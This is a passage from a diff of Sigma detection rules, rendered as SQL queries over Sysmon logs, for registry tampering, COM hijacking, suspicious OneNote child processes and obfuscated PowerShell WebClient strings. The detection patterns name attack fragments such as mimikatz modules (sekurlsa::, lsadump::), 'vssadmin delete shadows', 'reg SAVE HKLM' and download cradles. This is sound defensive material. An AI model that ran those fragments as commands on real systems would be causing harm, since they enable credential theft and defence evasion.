'%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine 